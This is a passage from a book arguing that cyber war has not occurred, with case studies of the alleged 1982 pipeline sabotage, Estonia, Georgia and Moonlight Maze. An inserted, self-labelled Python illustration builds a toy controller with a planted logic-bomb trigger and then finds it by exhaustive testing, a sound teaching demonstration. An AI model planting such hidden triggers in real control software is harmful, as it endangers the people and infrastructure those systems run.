PREFACE


The threat of cyber war has captured the popular imagination. Hollywood
was quick to realize and express these fears for us. Films like
Wargames (1983) or, more recently, Die Hard 4.0 (2007) trod the
obvious narrative path: dark forces mobilizing arcane and complex computer
networks to wreak havoc, holding entire nations hostage and
unleashing nuclear war by hacking into the Pentagon’s vast and powerful
computer systems. Such fears have always touched a deep nerve. Most
of us use computers but don’t really understand how hardware and
software interact. A powerful embodiment of the pervasive human angst
of losing control to technology itself was HAL, Stanley Kubrick’s terrifying,
all-controlling machine aboard a spaceship in 2001: A Space
Odyssey (1968). As more and more of us as well as more and more things
go online, such fears cut deeper than ever.

Most people, young and old, carry a smart phone in their pocket at
all times. And a great many have become addicted to connectivity, incessantly,
sometimes furtively, checking their email and social media
feeds—at the dinner table, on the beach, under the table at business
meetings, and not just dull ones. An entire generation has grown up
who believe that their personal and professional well-being depends on
digital devices and constant connectivity. If you are fiddling with your
touch screen before your morning coffee is ready, the chances are that
you intuitively understand that almost everything that enables the rest
of your day is controlled by computers: the water that flows from the
tap, the electricity plant that powers your kettle, the traffic lights that
help you cross the street, the train that takes you to work, the cash
machine that gives you money, the lift that you use in the office, the
plane that gets you to Berlin or Delhi or New York, the navigation system
you will use to find your way around a less familiar city, and much
more besides. All these features of life are now commonplace, and
unremarkable—as long as they work. Just as commonplace and insidious is
the all-pervasive fear that malicious actors lie in wait, at all hours, to
assault and crash these computers and the software they run, thereby
bringing entire societies to their knees. Water will stop flowing, the
lights go out, trains derail, banks lose our financial records, the roads
descend into chaos, elevators fail, and planes fall from the sky. Nobody,
this adage has it, is safe from the coming cyber war. Our digital demise
is only a question of time.

These fears are diverting. They distract from the real significance of
cyber security: in several ways, cyber attacks are not creating more vectors
of violent interaction; rather they are making previously violent
interactions less violent. Only in the twenty-first century has it become
possible for armed forces to cripple radar stations and missile launchers
without having to bomb an adversary’s air defense system and kill its
personnel and possibly civilians in the process. Now this can be achieved
through cyber attack. Only in the twenty-first century did it become
possible for intelligence agencies to exfiltrate and download vast quantities
of secret data through computer breaches, without sending spies
into dangerous places to bribe, coerce, and possibly harm informants
and sources first. Only in the twenty-first century can rebels and insurgents
mobilize dedicated supporters online and get thousands of them
to take to the streets, without spreading violence and fear to undermine
the government’s grip on power.

The ubiquitous rise of networked computers is changing the business
of soldiers, spies, and subversives. Cyberspace is creating new—and
often non-violent—opportunities for action. But these new opportunities
come with their own sets of limitations and challenges, applicable
equally to those trying to defend against new attack vectors as much as
those seeking to exploit new technology for offensive purposes. This
book explores the opportunities and challenges that cyberspace is creating
for those who use violence for political purposes, whether they
represent a government or not.

The rise of sophisticated computer incursions poses significant risks
and threats, and understanding these risks and threats and developing
adequate responses to mitigate them is of critical importance—so a
short word on the evolving cyber security debate is appropriate here: the
debate on cyber security is flawed, and in many quarters its quality is
abysmally low. The larger debate takes place in technology journals,
magazines, on specialised web forums, and of course in the mainstream
media as well as in academia and on blogs and microblogs. It takes place
at countless workshops and conferences that bring together representatives
from the private sector, governments, intelligence agencies and the
military, as well as hackers and scholars from a variety of academic disciplines.
It happens publicly as well as behind closed doors and in classified
environments. No doubt: a number of deeply versed experts from
various backgrounds regularly produce high-quality research output on
cyber security, and this book could not have been written without using
their good work. But the wider one moves in political or military circles,
in think tanks, parliaments, ministries, and military academies, the
lower seems the density of genuine experts and the higher pitched the
hyperbole. The policy debate’s lagging quality is neatly illustrated by the
emergence of an odd bit of jargon, the increasing use of the word
“cyber” as a noun among policy wonks and many a uniformed officer.
As in, “I’m interested in cyber,” or, “What’s the definition of cyber?,” as
one civil servant once asked me in sincerity after I recommended in a
presentation in the Houses of Parliament not to use that empty yet
trendy buzzword as a noun. Note that computer scientists, programmers,
or software security experts do not tend to use “cyber” as a noun,
neither do technology journalists nor serious scholars. I’ve come to be
highly distrustful of “nouners,” as all too often they don’t seem to appreciate
the necessary technical details—the phenomenon can be observed
widely in Washington, but also in London, Paris, Berlin, and elsewhere.
Improving the quality of the debate is all the more crucial. The public
deserves a far better informed, more nuanced, and more realistic debate
than that which has taken place hitherto. The public also deserves better
thought-out and executed policies and legislation on cyber security.

Cyber War Will Not Take Place was written with the ambition of offering
the reader a solid yet accessible contribution to this debate, an
attempt to help consolidate the discussion, attenuate some of the hype,
and adequately confront some of the most urgent security challenges.
The book is designed to be a resource for students, analysts, and journalists.
The expert debate on cyber security, as well as taught courses on
cyber security, is spread across various academic disciplines, the most
important of which are political science and computer science, with
legal studies and sociology not far behind. Readers from either discipline
will, I hope, find this book insightful: engineers, geeks, and technology
enthusiasts may benefit from the strategic bird’s-eye-view; policy analysts
and sociologists may gain something from its accessibly presented technical
details; and students from either field may appreciate both. However,
no single author can even hope to cover the full spectrum of cyber
security, as the long vote of thanks in my acknowledgments makes clear.
To make the book more approachable, its nine chapters can be read as
stand-alone essays, each of which presents its own questions, argument
and set of micro-case studies to illustrate specific points.

As for the sources used in this book, the most stimulating debates on
recent cyber security developments are occurring not in scholarly journals
but on a significant number of technology blogs and other websites
that cannot be described as blogs. Some of the most important longer
papers and reports are also not published in journals that can be cited
according to established academic conventions, but on websites of companies
and sometimes individuals. I generally cite the commonly used
details: author name, title, publication forum, and date of publication.
Readers will be able to find these sources through a quick Google search.
Only items that may be harder to locate come with a URL. But because
many URLs are clunky as well as short-lived, I decided to provide a
bitly.com link with statistics instead, for instance, http://bitly.com/OtcuJx+. 1
This link will take the reader to a bitly.com page that shows
the full link, the date it was first used, and more usage statistics—even
when that link has expired.
THE ARGUMENT


In the mid-1930s, inspired by Europe’s political descent into the First
World War over the tragic summer of 1914, the French dramatist Jean
Giraudoux wrote a famous play, La guerre de Troie n’aura pas lieu (The
Trojan War Will Not Take Place). The English playwright Christopher
Fry later translated its two acts in 1955 as Tiger at the Gates. 1 The plot is
set inside the gates of the city of Troy. Hector, a disillusioned Trojan
commander, tries to avoid in vain what the seer Cassandra has predicted
to be inevitable: war with the Greeks. Giraudoux was a veteran of 1914
and later worked in the Quai d’Orsay, or French Foreign Office. His
tragedy is an eloquent critique of Europe’s leaders, diplomats, and intellectuals
who were, again, about to unleash the dogs of war. The play
premiered in November 1935 in the Théâtre de l’Athénée in Paris,
almost exactly four years before the dramatist’s fears would be realized.

Judging from recent pronouncements about cyber war, the world
seems to be facing another 1935-moment. “Cyberwar Is Coming!”
declared the RAND Corporation’s John Arquilla and David Ronfeldt in
1993. 2 It took a while for the establishment to catch on. “Cyberspace is
a domain in which the Air Force flies and fights,” announced Michael
Wynne, the US secretary of the Air Force, in 2006. Four years later the
Pentagon leadership joined in. “Although cyberspace is a man-made
domain,” wrote William Lynn, America’s deputy secretary of defense, in
a 2010 Foreign Affairs article, it has become “just as critical to military
operations as land, sea, air, and space.” 3 Richard Clarke, the White
House’s former cyber czar, invokes calamities of a magnitude that make
9/11 pale in comparison and urges taking several measures “simultaneously
and now to avert a cyber war disaster.” 4 In February 2011, the
then CIA Director Leon Panetta warned the House Permanent Select
Committee on Intelligence: “The next Pearl Harbor could very well be
a cyber attack.” 5 Panetta later repeated this dire warning as head of the
Pentagon. In late 2012, Mike McConnell, George W. Bush’s director of
national intelligence until 2009, warned darkly that America could not
“wait for the cyber equivalent of the collapse of the World Trade Centers.” 6
Yet while US politicians were warning of digital doom, America’s
covert operators were busy unleashing a highly sophisticated computer
worm, known as Stuxnet, to wreck the Iranian nuclear enrichment program
at Natanz. One much-noted investigative article in Vanity Fair
concluded that the event foreshadowed the destructive new face of
twenty-first-century warfare, “Stuxnet is the Hiroshima of cyber-war.” 7

But is it? Are the Cassandras on the right side of history? Has cyber 
conflict indeed entered the “fifth domain” of warfare? Is cyber war really 
coming? 

This book argues that cyber war will not take place, a statement that
is not necessarily accompanied with an ironical Giraudouxian twist. It
is meant rather as a comment about the past, the present, and the likely
future: cyber war has never happened in the past, it does not occur in
the present, and it is highly unlikely that it will disturb our future. Instead,
the opposite is taking place: a computer-enabled assault on violence
itself. All past and present political cyber attacks—in contrast to
computer crime—are sophisticated versions of three activities that are as
old as human conflict itself: sabotage, espionage, and subversion. And
on closer examination, cyber attacks help to diminish rather than accentuate
political violence in three discrete ways. First, at the technical
high-end, weaponized code and complex sabotage operations enable
highly targeted attacks on the functioning of an adversary’s technical
systems without directly physically harming the human operators and
managers of such systems. Even more likely are scenarios of code-borne
sabotage inflicting significant financial and reputational damage without
causing any physical harm to hardware at all. Secondly, espionage is
changing: computer attacks make it possible to exfiltrate data without
infiltrating humans first in highly risky operations that may imperil
them. Yet, paradoxically, the better intelligence agencies become at
“cyber,” the less they are likely to engage in cyber espionage narrowly
defined. And finally subversion may be becoming less reliant on armed
direct action: networked computers and smartphones make it possible
to mobilize followers for a political cause peacefully. In certain conditions,
undermining the collective trust and the legitimacy of an established
order requires less violence than in the past, when the state may
have monopolized the means of mass communication. This applies
especially in the early phases of unrest.

But offensively minded tech-enthusiasts should hold their breath. For
these changes in the nature of political violence come with their own
limitations. And these limitations greatly curtail the utility of cyber
attacks. Using organized violence and putting trained and specialized
personnel at risk also has unique benefits that are difficult or impossible
to replicate in cyberspace. And again these limitations apply to all three
types of political violence in separate ways. First, for subversives, new
forms of online organization and mobilization also mean higher membership
mobility, higher dependency on causes, and less of a role for
leaders who may impose internal cohesion and discipline, possibly by
coercive means. Starting a movement is now easier, but succeeding is
more difficult. Second, using pure cyber espionage without human
informers creates unprecedented difficulties for those trying to put data
into context, interpret the intelligence, assess it, and turn it into political
(or commercial) advantage. Getting data is now easier, but not using
them. Finally, at the technical high-end, it is a massive challenge to use
cyber weapons as instruments in the service of a wider political goal, not
just in one-off and impossible-to-repeat sabotage stints that are more
relevant to geeks with a tunnel view than to heads of states with a bird’s-eye
perspective.

The book’s argument is presented in seven chapters. The first chapter
outlines what cyber war is—or rather what it would be, were it to take
place. Any attempt to answer this question has to start conceptually. An
offensive act has to meet certain criteria in order to qualify as an act of
war: it has to be instrumental; it has to be political; and, most crucially,
it has to be violent, or at least potentially violent. The second chapter
considers the altered meaning of violence in the context of cyber attacks.
The third chapter examines an increasingly popular idea, “cyber weapons,”
and discusses the potential as well as the limitations of code-borne
instruments of harm. The book continues by exploring some
frequently cited examples of offensive and violent political acts in
cyberspace case by case. The fourth chapter considers sabotage. To date,
the world has not experienced a major physically destructive attack
against highly vulnerable and badly secured industrial control systems,
such as power plants, the electricity grid, or other critical utilities—this
chapter offers an explanation for this conspicuous absence (or perhaps
delay), and assesses the real risk of potentially crippling future attacks on
a developed society’s infrastructure. Chapter five scrutinizes espionage by
means of computer network attack. In many ways, cyber espionage
represents a paradox: it is almost always a non-violent form of network
breach that is also the most fundamental and potentially game-changing
threat to developed nations, mostly for economic reasons rather than for
reasons of national security, strictly and narrowly defined. Chapter six
explores perhaps the most widespread form of activism and political
violence in cyberspace, subversion. Technology, it finds, has lowered the
entry costs for subversive activity but it has also raised the threshold for
sustained success. Chapter seven assesses the attribution problem, an
issue that has been at the root of cyber security. If attribution is recognized
for what it is, as a political rather than a technical problem, then it
becomes possible to see that the problem itself is a function of an attack’s
severity. The conclusion offers a summary and hopes to take the debate
beyond the tired and wasted metaphor of “cyber war.” 8
WHAT IS CYBER WAR?


Carl von Clausewitz still offers the most concise and the most fundamental
concept of war. Sun Tzu, a much older strategic thinker, often
made a showing in the debate on information warfare in the 1990s. But
the ancient Chinese general and philosopher is better known for punchy
aphorisms than systematic thought—long sections of his book, The Art
of War, read like a choppy Twitter-feed from 500 BC. Sun’s modern
Prussian nemesis offers a far more coherent and finely tuned toolset for
rigorous analysis. Clausewitz’s concepts and ideas, although limited in
many ways, continue to form the core vocabulary of professionals and
experts in the use of force. Clausewitz identifies three main criteria. Any
aggressive or defensive action that aspires to be a stand-alone act of war,
or may be interpreted as such, has to meet all three. Past cyber attacks
do not.

The first element is war’s violent character. “War is an act of force to
compel the enemy to do our will,” wrote Clausewitz on the first page of
On War. 1 All war, pretty simply, is violent. If an act is not potentially
violent, it’s not an act of war and it’s not an armed attack—in this
context the use of the word will acquire a metaphorical dimension, as in
the “war” on obesity or the “war” on cancer. A real act of war or an
armed attack is always potentially or actually lethal, at least for some
participants on at least one side. Unless physical violence is stressed, war
is a hodgepodge notion, to paraphrase Jack Gibbs. 2 The same applies to
the idea of a weapon. In Clausewitz’s thinking, violence is the pivotal
point of all war. Both enemies—he usually considered two sides—would
attempt to escalate violence to the extreme, unless tamed by friction,
imponderables, and politics. 3

The second element highlighted by Clausewitz is war’s instrumental
character. An act of war is always instrumental, and to be instrumental
there has to be a means and an end: physical violence or the threat of
force is the means; forcing the enemy to accept the offender’s will is the
end. Such a definition is “theoretically necessary,” Clausewitz argued. 4 To
achieve the end of war, one opponent has to be rendered defenseless. Or,
to be more precise, the opponent has to be brought into a position,
against their will, where any change of that position brought about by
the continued use of arms would only bring more disadvantages, at least
in that opponent’s view. Complete defenselessness is only the most
extreme of those positions. Both opponents in a war use violence in this
instrumental way, shaping each other’s behavior, giving each other the
law of action, in the words of the Prussian philosopher of war. 5 The
instrumental use of means takes place on tactical, operational, strategic,
and political levels. The higher the order of the desired goal, the more
difficult it is to achieve. As Clausewitz put it, in the slightly stilted language
of his time: “The purpose is a political intention, the means is
war; never can the means be understood without the purpose.” 6

This leads to the third and most central feature of war—its political 
nature. An act of war is always political. The objective of battle, to 
“throw” the enemy and to make him defenseless, may temporarily blind 
commanders and even strategists to the larger purpose of war. War is 
never an isolated act, nor is it ever only one decision. In the real world, 
war’s larger purpose is always a political purpose. It transcends the use 
of force. This insight was famously captured by Clausewitz’s most 
famous phrase, “War is a mere continuation of politics by other means.” 7 
To be political, a political entity or a representative of a political entity, 
whatever its constitutional form, has to have an intention, a will. That 
intention has to be articulated. And one side’s will has to be transmitted 
to the adversary at some point during the confrontation (it does not 
have to be publicly communicated). A violent act and its larger political 
intention must also be attributed to one side at some point during the 
confrontation. History does not know of acts of war without eventual 
attribution. 8 
One modification is significant before applying these criteria to cyber
offenses. The pivotal element of any warlike action remains the “act of
force.” An act of force is usually rather compact and dense, even when
its components are analyzed in detail. In most armed confrontations, be
they conventional or unconventional, the use of force is more or less
straightforward: it may be an F-16 striking targets from the air, artillery
barrages, a drone-strike, improvised explosive devices placed by the side
of a road, even a suicide bomber in a public square. In all these cases, a
combatant’s or an insurgent’s triggering action—such as pushing a button
or pulling a trigger—will immediately and directly result in casualties,
even if a timer or a remote control device is used, as with a drone
or a cruise missile, and even if a programmed weapon system is able to
semi-autonomously decide which target to engage or not. 9 An act of
cyber war would be an entirely different game.

In an act of cyber war, the actual use of force is likely to be a far more
complex and mediated sequence of causes and consequences that ultimately
result in violence and casualties. 10 One often-invoked scenario is
a Chinese cyber attack on the US homeland in the event of a political
crisis in, say, the Taiwan Straits. The Chinese could blanket a major city
with blackouts by activating so-called logic-bombs that had been pre-installed
in America’s electricity grid. Financial information could be
lost on a massive scale. Derailments could crash trains. Air traffic systems
and their backups could collapse, leaving hundreds of planes aloft
without communication. Industrial control systems of highly sensitive
plants, such as nuclear power stations, could be damaged, potentially
leading to loss of cooling, meltdown, and contamination 11 —people
could suffer serious injuries or even be killed. Military units could be
rendered defenseless. In such a scenario, the causal chain that links
somebody pushing a button to somebody else being hurt is mediated,
delayed, and permeated by chance and friction. Yet such mediated destruction
caused by a cyber offense could, without doubt, be an act of
war, even if the means were not violent, only the consequences. 12
Moreover, in highly networked societies, non-violent cyber attacks could
cause economic consequences without violent effects that could exceed
the harm of an otherwise smaller physical attack. 13 For one thing, such
scenarios have caused widespread confusion. “Rarely has something
been so important and so talked about with less clarity and less apparent
understanding than this phenomenon,” commented Michael Hayden,
formerly director of the Central Intelligence Agency (CIA) as well as the
National Security Agency (NSA). 14 And secondly, to date all such scenarios
have another major shortfall: they remain fiction, not to say
science fiction.

If the use of force in war is violent, instrumental, and political, then 
there is no cyber offense that meets all three criteria. But more than that, 
there are very few cyber attacks in history that meet only one of these 
criteria. It is useful to consider the most-quoted offenses case by case, 
and criterion by criterion. 

The most violent “cyber” attack to date is likely to have been a Siberian
pipeline explosion—if it actually happened. In 1982, a covert American
operation allegedly used rigged software to cause a massive
explosion in Russia’s Urengoy-Surgut-Chelyabinsk pipeline, which
connected the Urengoy gas fields in Siberia across Kazakhstan to European
markets. The gigantic pipeline project required sophisticated
control systems for which the Soviet operators had to purchase computers
on open markets. The Russian pipeline authorities tried to acquire
the necessary Supervisory Control and Data Acquisition software,
known as SCADA, from the United States but were turned down. The
Russians then attempted to get the software from a Canadian firm. The
CIA is said to have succeeded in inserting malicious code into the
control system that ended up being installed in Siberia. The code that
controlled pumps, turbines, and valves was programmed to operate
normally for a time and then “to reset pump speeds and valve settings to
produce pressures far beyond those acceptable to pipeline joints and
welds,” recounted Thomas Reed, an official in the National Security
Council at the time. 15 In June 1982, the rigged valves probably resulted
in a “monumental” explosion and fire that could be seen from space.
The US Air Force reportedly rated the explosion at 3 kilotons, equivalent
to a small nuclear device. 16

But there are three problems with this story. The first pertains to the
Russian sources. When Reed’s book came out in 2004, Vasily Pchelintsev,
a former KGB head of the Tyumen region where the alleged explosion
was supposed to have taken place, denied the story. He surmised
that Reed might have been referring to an explosion that happened not
in June but on a warm April day that year, 50 kilometers from the city
of Tobolsk, caused by shifting pipes in the thawing ground of the tundra.
No one was hurt in that explosion. 17 There are no media reports
from 1982 that would confirm Reed’s alleged explosion, although regular
accidents and pipeline explosions in the USSR were reported in the
early 1980s. Later Russian sources also fail to mention the incident. In
1990, when the Soviet Union still existed, Lieutenant General Nikolai
Brusnitsin published a noteworthy and highly detailed small book,
translated as Openness and Espionage. Brusnitsin was the deputy chairman
of the USSR’s State Technical Commission at the time. His book
has a short chapter on “computer espionage,” where he discusses several
devices that Soviet intelligence had discovered over previous years. He
recounts three different types of discoveries: finding “blippers” inserted
into packages to monitor where imported equipment would be installed;
finding “additional electronic ‘units’ which have nothing to do with
the machine itself,” designed to pick up and relay data; and finding
“gimmicks which render a computer totally inoperative” by destroying
“both the computer software and the memory.” 18 Brusnitsin even provided
examples. The most drastic example was a “virus,” the general wrote,
implanted in a computer that was sold by a West German firm to a
Soviet shoe factory. It is not unreasonable to assume that if the pipeline
blitz had happened, Brusnitsin would have known about it and most
likely written about it, if not naming the example then at least naming
the possibility of hardware sabotage. He did not do that.

A second problem concerns the technology that was available at the
time. It is uncertain if a “logic bomb” in 1982 could have been hidden
easily. Retrospectively analyzing secretly modified software in an industrial
control system three decades after the fact is difficult to impossible.
But a few generalizations are possible: at the time technology was far
simpler. A system controlling pipelines in the early 1980s would probably
have been a fairly simple “state machine,” and it would probably
have used an 8-bit micro-controller. Back in 1982, it was most likely still
possible to test every possible output that might be produced by all possible
inputs. (This is not feasible with later microprocessors.) Any hidden
outputs could be discovered by such a test—an input of “X” results in
dangerous output “Y.” 19 Testing the software for flaws, in other words,
would have been rather easy. Even with the technology available at the
time, a regression test would have needed less than a day to complete,
estimated Richard Chirgwin, a long-standing technology reporter. 20 In
short, in 1982 it was far more difficult to “hide” malicious software.
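To make the exhaustive-testing argument concrete, here is an added Python illustration; it is not from the book and is not a reconstruction of any real pipeline controller. It models a toy control loop with an 8-bit cycle counter as state and an 8-bit sensor reading as input, once honest and once with a hypothetical planted trigger, and then sweeps all 65,536 (state, input) pairs the way a 1982 tester could have. The safe-pressure ceiling, the trigger condition and every function name are assumptions for the example.

```python
"""Exhaustive (state, input) testing of a toy 8-bit pipeline controller.

Added example, not the book's material and not modelled on any real
SCADA product. The controller, the safe-pressure ceiling and the planted
trigger condition are all constructed for illustration.
"""
from itertools import product

MAX_SAFE_PRESSURE = 200   # assumed ceiling the joints and welds tolerate


def honest_controller(state, sensor):
    """One control cycle: the pump setting follows the sensor reading,
    clamped to the safe ceiling; the 8-bit state is a wrapping cycle counter.
    Returns (next_state, pump_setting)."""
    pump = min(sensor, MAX_SAFE_PRESSURE)
    return (state + 1) & 0xFF, pump


def rigged_controller(state, sensor):
    """Same loop with a hypothetical logic bomb: on one specific
    (cycle count, sensor reading) pair it drives the pump past the ceiling."""
    next_state, pump = honest_controller(state, sensor)
    if state == 0xA5 and sensor == 0x3C:   # constructed trigger condition
        pump = 0xFF
    return next_state, pump


def find_unsafe_outputs(controller):
    """Run the controller over every (state, sensor) pair an 8-bit machine
    can be in, 256 * 256 = 65,536 cases, and report the ones whose
    output exceeds the ceiling. Returns a list of (state, sensor, pump)."""
    unsafe = []
    for state, sensor in product(range(256), range(256)):
        _, pump = controller(state, sensor)
        if pump > MAX_SAFE_PRESSURE:
            unsafe.append((state, sensor, pump))
    return unsafe


if __name__ == "__main__":
    print("honest controller unsafe cases:", find_unsafe_outputs(honest_controller))
    print("rigged controller unsafe cases:", find_unsafe_outputs(rigged_controller))
```

The sweep only covers what it enumerates. It finds the planted pair because the whole machine state fits in 16 bits; a trigger keyed to a 32-bit cycle counter or a calendar date would have to bring those registers into the test space, and 2^32 or more cases is exactly where the text's caveat about later microprocessors bites. This checker also looks only at the pump output; a bomb that tampers with the state transition instead would require comparing next_state against the honest transition as well.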

Thirdly, even after the CIA declassified the so-called Farewell Dossier,
which described the effort to provide the Soviet Union with defective
technology, the agency did not confirm that such an explosion took
place. If it happened, it is unclear if the explosion resulted in casualties.
The available evidence on the event is so thin and questionable that it
cannot be counted as a proven case of a successful logic bomb.

Another oft-quoted example of cyber war is an online onrush on
Estonia that began in late April 2007. At that time Estonia was one of
the world’s most connected nations; two-thirds of all Estonians used the
Internet and 95 per cent of banking transactions were done electronically. 21
The small and well-wired Baltic country was vulnerable to cyber
attacks. The story behind the much-cited incident started about two
weeks before 9 May, a highly emotional day in Russia when the victory
against Nazi Germany is remembered. With indelicate timing, authorities
in Tallinn decided to move the two-meter Bronze Soldier, a Russian
Second World War memorial of the Unknown Soldier, from the center
of the capital to its outskirts. The Russian-speaking population, as well
as neighboring Russia, was aghast. On 26 and 27 April, Tallinn saw
violent street riots, with 1,300 arrests, 100 injuries, and one fatality.

The street riots were accompanied by online commotions. The cyber
attacks started in the late hours of Friday, 27 April. Initially the offenders
used rather inept, low-tech methods, such as ping floods or denial
of service (DoS) attacks—basic requests for information from a server,
as when an Internet user visits a website by loading the site’s content.
Then the assault became slightly more sophisticated. Starting on 30
April, simple botnets were used to increase the volume of distributed
denial of service (DDoS) attacks, and the timing of these collective activities
became increasingly coordinated. Other types of nuisances
included email and comment spam as well as the defacement of the
Estonian Reform Party’s website. Estonia experienced what was then the
worst-ever DDoS. The attacks came from an extremely large number of
hijacked computers, up to 85,000, and they went on for an unusually
long time, for three weeks, until 19 May. The attacks reached a peak on
9 May, when Moscow celebrates Victory Day. Fifty-eight Estonian websites
were brought down at once. The online services of Estonia’s largest
bank, Hansapank, were unavailable for ninety minutes on 9 May and
for two hours a day later. 22 The effect of these coordinated online protests
on business, government, and society was noticeable, but ultimately
remained minor. The only long-term consequence of the incident
was that the Estonian government succeeded in getting NATO to establish
a permanent agency in Tallinn, the Cooperative Cyber Defence
Centre of Excellence.

A few things are notable about the story. It remained unclear who was 
behind the attacks. Estonia’s defense minister as well as the country’s top 
diplomat pointed their fingers at the Kremlin, but they were unable to 
muster evidence, retracting earlier statements that Estonia had been able 
to trace the IP addresses of some of the computers involved in the attack 
back to the Russian government. Neither experts from the Atlantic 
Alliance nor from the European Commission were able to identify 
Russian fingerprints in the operations. Russian officials described the 
accusations of their involvement as “unfounded.” 23 

Keeping Estonia’s then-novel experience in perspective is important. 
Mihkel Tammet, an official in charge of ICT for the Estonian Ministry 
of Defense, described the time leading up to the launch of the attacks as 
a “gathering of botnets like a gathering of armies.” 24 Andrus Ansip, then 
Estonia’s prime minister, asked, “What’s the difference between a 
blockade of harbors or airports of sovereign states and the blockade of 
government institutions and newspaper web sites?” 25 It was of course a 
rhetorical question. Yet the answer is simple: unlike a naval blockade, 
the mere “blockade” of websites is not violent, not even potentially; 
unlike a naval blockade, the DDoS assault was not instrumentally tied 
to a tactical objective, but rather to an act of undirected protest; and 
unlike ships blocking the way, the pings remained anonymous, without 
political backing. Ansip could have asked what the difference was 
between a large popular demonstration blocking access to buildings and 
the blocking of websites. The comparison would have been more 
adequate, but still flawed for an additional reason: many more actual people 
have to show up for a good old-fashioned demonstration. 

A year later a third major event occurred that would enter the 
Cassandra’s tale of cyber war. The context was the ground war between the 
Russian Federation and Georgia in August of 2008. The short armed 
confrontation was triggered by a territorial dispute over South Ossetia. 
On 7 August, the Georgian army reacted to provocations by attacking 
South Ossetia’s separatist forces. One day later, Russia responded mili¬ 
tarily. Yet a computer attack on Georgian websites had started slowly on 
29 July, weeks before the military confrontation and with it the main 
cyber offense, both of which started on 8 August. This may have been 
the first time that an independent cyber attack has taken place in sync 
with a conventional military operation. 26 

The cyber attacks on Georgia comprised three different types. Some 
of the country’s prominent websites were defaced, for instance that of 
Georgia’s National Bank and the Ministry of Foreign Affairs. The most 
notorious defacement was a collage of portraits juxtaposing Adolf Hitler 
and Mikheil Saakashvili, the Georgian president. The second type of 
offense was denial-of-service attacks against websites in the Georgian 
public and private sectors, including government websites and that of 
the Georgian parliament, but also news media, Georgia’s largest 
commercial bank, and other minor websites. The online onslaughts, on 
average, lasted around two hours and fifteen minutes, the longest up to 
six hours. 27 A third method was an effort to distribute malicious software 
to deepen the ranks of the attackers and the volume of attacks. Various 
Russian-language forums helped distribute scripts that enabled the 
public to take action, even posting the attack script in an archived 
version, war.rar, which prioritized Georgian government websites. In a 
similar vein, the email accounts of Georgian politicians were spammed. 

The effects of the episode were again rather minor. Despite the 
warlike rhetoric of the international press, the Georgian government, and 
anonymous hackers, the attacks were not violent. And Georgia, a small 
country with a population of 4.6 million, was far less vulnerable to 
attacks than Estonia; web access was relatively low and few vital services 
like energy, transportation, or banking were tied to the Internet. The 
entire affair had little effect beyond making a number of Georgian 
government websites temporarily inaccessible. The attack was also only 
minimally instrumental. The National Bank of Georgia ordered all 
branches to stop offering electronic services for ten days. The main 
damage caused by the attack was in limiting the government’s ability to 
communicate internationally, thus preventing the small country’s voice 
being heard at a critical moment. If the attackers intended this effect, its 
utility was limited: the foreign ministry took a rare step, with Google’s 
permission, and set up a blog on Blogger, the company’s blogging plat¬ 
form. This helped keep one more channel to journalists open. Most 
importantly, the offense was not genuinely political in nature. As in the 
Estonian case, the Georgian government blamed the Kremlin. But 
Russia again denied official sponsorship of the attacks. NATO’s 
Tallinn-based cyber security center later published a report on the Georgia 
attacks. Although the onrush appeared coordinated and instructed, and 
although the media were pointing fingers at Russia, “there is no 
conclusive proof of who is behind the DDoS attacks,” NATO concluded, “as 
was the case with Estonia.” 28 

The cyber scuffles that accompanied the street protests in Estonia and 
the short military ground campaign in Georgia were precedents. Perhaps 
the novelty of these types of offenses was the main reason for their high 
public profile and the warlike rhetoric that surrounded them. The same 
observation might be true for another type of “cyber war,” high-profile 
spying operations, an early example of which is Moonlight Maze. This 
lurid name was given to a highly classified cyber espionage incident that 
was discovered in 1999. The US Air Force coincidentally discovered an 
intrusion into its network, and the Federal Bureau of Investigation (FBI) 
was alerted. The federal investigators called the NSA. An investigation 
uncovered a pattern of intrusion into computers at the National 
Aeronautics and Space Administration (NASA), at the Department of Energy, 
and at universities as well as research laboratories, which had started in 
March 1998. Maps of military installations were copied, as were 
hardware designs and other sensitive information. The incursions went on for 
almost two years. The Department of Defense (DoD) was able to trace 
the attack to what was then called a mainframe computer in Russia. But 
again: no violence, unclear goals, no political attribution. 

Yet the empirical trend is obvious: over the past dozen years, cyber 
attacks have been steadily on the rise. The frequency of major security 
breaches against governmental and corporate targets has grown. The 
volume of attacks is increasing, as is the number of actors participating 
in such episodes, ranging from criminals to activists to the NSA. The 
range of aggressive behavior online is widening. At the same time the 
sophistication of some attacks has reached new heights, and in this 
respect Stuxnet has indeed been a game-changing event. Yet despite these 
trends the “war” in “cyber war” ultimately has more in common with 
the “war” on obesity than with the Second World War—it has more 
metaphorical than descriptive value. It is high time to go back to classic 
terminology and understand cyber offenses for what they really are. 

Aggression, whether it involves computers or not, can be criminal or 
political in nature. It is useful to group offenses along a spectrum, 
stretching from ordinary crime all the way up to conventional war. A few 
distinctive features then become visible: crime is mostly apolitical, war is 
always political; criminals conceal their identity, uniformed soldiers 
display their identity openly. Political violence (or “political crime” in 
criminology and the theory of law) occupies the muddled middle of this 
spectrum, being neither ordinary crime nor ordinary war. For reasons of 
simplicity, this middle stretch of the spectrum will be divided into three 
segments here: subversion, espionage, and sabotage. All three activities 
may involve states as well as private actors. Cyber offenses tend to be 
skewed towards the criminal end of the spectrum. So far there is no 
known act of cyber “war,” when war is properly defined. This of course 
does not mean that there are no political cyber offenses. But all known 
political cyber offenses, criminal or not, are neither common crime nor 
common war. Their purpose is subverting, spying, or sabotaging. 

In all three cases, Clausewitz’s three criteria are jumbled. These 
activities need not be violent to be effective. They need not be instrumental 
to work, as subversion may often be an expression of collective passion 
and espionage may be an outcome of opportunity rather than strategy. 
And finally: aggressors engaging in subversion, espionage, or sabotage 
do act politically: but in sharp contrast to warfare, they are likely to have 
a permanent or at least a temporary interest in avoiding attribution. This 
is one of the main reasons why political crime, more than acts of war, 
has thrived online, where non-attribution is easier to achieve than 
waterproof attribution. It goes without saying that subversion, espionage, and 
sabotage—digitally facilitated or not—may accompany military 
operations. Both sides may engage in these activities, and have indeed done 
so since time immemorial. But the advent of digital networks had an 
uneven effect. Understanding this effect requires surveying the 
foundation: the notion of violence. 

On 6 September 2007 the Israeli Air Force bombed the construction 
site of a nuclear reactor at Dayr ez-Zor in Northern Syria. To prepare the 
air raid, a secret Israeli agency neutralized a single Syrian radar site at 
Tall al-Abuad, close to the Turkish border. To do so, the Israelis probably 
used computer sabotage. This intrusion achieved something that would 
previously have required the physical destruction of radar installations, 
damaging property, potentially hurting or killing some of the system’s 
operators, and possibly innocent civilians: a missile strike or an 
infiltration of Special Forces teams to blow up the site would have been the 
